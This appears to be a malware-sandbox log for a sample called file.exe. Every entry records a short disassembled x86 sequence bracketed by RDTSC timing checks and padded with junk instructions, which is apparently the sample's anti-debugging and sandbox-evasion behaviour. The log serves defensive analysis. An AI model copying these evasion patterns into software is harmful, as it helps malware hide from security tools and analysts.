Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A955C7 second address: A955F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F661D451447h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F661D451436h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95894 second address: A958AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 js 00007F661CE75E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A958AC second address: A958B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF456 second address: 9EF45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9DE99 second address: A9DEA3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E023 second address: A9E029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E029 second address: A9E02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E02D second address: A9E035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E035 second address: A9E03F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F661D45143Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E03F second address: A9E069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F661CE75E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F661CE75E92h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E069 second address: A9E06E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E06E second address: A9E074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E1CF second address: A9E1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E1D5 second address: A9E1F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F661CE75E92h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E3A2 second address: A9E3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E3A7 second address: A9E3B1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA6226 second address: AA622A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA622A second address: AA6230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA637C second address: AA6383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA6630 second address: AA6636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAECF6 second address: AAED01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB2211 second address: AB2238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push esi 0x0000000b jnc 00007F661CE75E8Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB2238 second address: AB223E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB223E second address: AB2242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF125 second address: ABF148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 jp 00007F661D45143Eh 0x0000000d jl 00007F661D451436h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF148 second address: ABF14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF14C second address: ABF150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF150 second address: ABF158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF158 second address: ABF160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF160 second address: ABF16C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF16C second address: ABF170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1717 second address: AC1721 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC135C second address: AC1364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1364 second address: AC1368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC14C6 second address: AC14D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC14D0 second address: AC14E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F661CE75E86h 0x0000000e ja 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6D81 second address: AC6D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD786B second address: AD7875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F661CE75E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8B7C second address: AD8B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8B9D second address: AD8BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8BA1 second address: AD8BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7E12 second address: AE7E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9F9E second address: AE9FA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC857 second address: AFC85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC85C second address: AFC862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFC862 second address: AFC866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFFDFF second address: AFFE16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F661D451436h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFFE16 second address: AFFE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFFE1A second address: AFFE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F661D451436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFFF60 second address: AFFF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B02441 second address: B0244C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1926B second address: B1928D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661CE75E8Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F661CE75E8Ah 0x00000015 jc 00007F661CE75E88h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1928D second address: B192A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Eh 0x00000009 jnl 00007F661D451436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B192A5 second address: B192B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jno 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19422 second address: B19428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19586 second address: B195B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F661CE75E86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F661CE75E8Ch 0x00000012 jmp 00007F661CE75E92h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19BE9 second address: B19BF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19EE9 second address: B19F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F661CE75E86h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 js 00007F661CE75E9Eh 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 je 00007F661CE75E86h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19F0F second address: B19F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B916 second address: B1B92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B92D second address: B1B941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F661D451436h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B941 second address: B1B94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F661CE75E86h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B94E second address: B1B958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1B958 second address: B1B969 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E345 second address: B1E34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E34A second address: B1E37B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jne 00007F661CE75E86h 0x00000012 jmp 00007F661CE75E94h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E37B second address: B1E37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E860 second address: B1E866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E866 second address: B1E88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F661D45143Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F661D45143Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E88C second address: B1E8C9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E9Fh 0x00000008 jmp 00007F661CE75E99h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E93h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E8C9 second address: B1E8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E8D4 second address: B1E8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E8E1 second address: B1E8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1E8F0 second address: B1E8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1FACE second address: B1FADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B215D2 second address: B215D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B215D6 second address: B215EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F661D45143Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B215EA second address: B215F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B215F1 second address: B215FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F661D451436h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A358A8 second address: A358C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Eh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A358C7 second address: A358CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A35A50 second address: A35A56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544032E second address: 5440334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440334 second address: 5440338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440338 second address: 54403B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F661D451447h 0x00000013 sub ah, 0000002Eh 0x00000016 jmp 00007F661D451449h 0x0000001b popfd 0x0000001c mov ah, 40h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F661D451443h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F661D451445h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54403B2 second address: 54403B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54403B8 second address: 54403DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54403DD second address: 54403F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440432 second address: 5440438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440438 second address: 5440459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F661CE75E8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440459 second address: 5440468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470710 second address: 5470714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470714 second address: 547071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547071A second address: 54707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661CE75E91h 0x00000011 and si, CA46h 0x00000016 jmp 00007F661CE75E91h 0x0000001b popfd 0x0000001c mov ax, 9CF7h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov di, ax 0x00000026 mov cx, 200Bh 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ebx 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007F661CE75E8Bh 0x0000003b sbb si, 862Eh 0x00000040 jmp 00007F661CE75E99h 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d push eax 0x0000004e pushad 0x0000004f mov dx, 9FC0h 0x00000053 popad 0x00000054 xchg eax, ecx 0x00000055 jmp 00007F661CE75E8Fh 0x0000005a xchg eax, esi 0x0000005b jmp 00007F661CE75E96h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54707E0 second address: 54707E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54707E6 second address: 54707EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54707EC second address: 54707F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
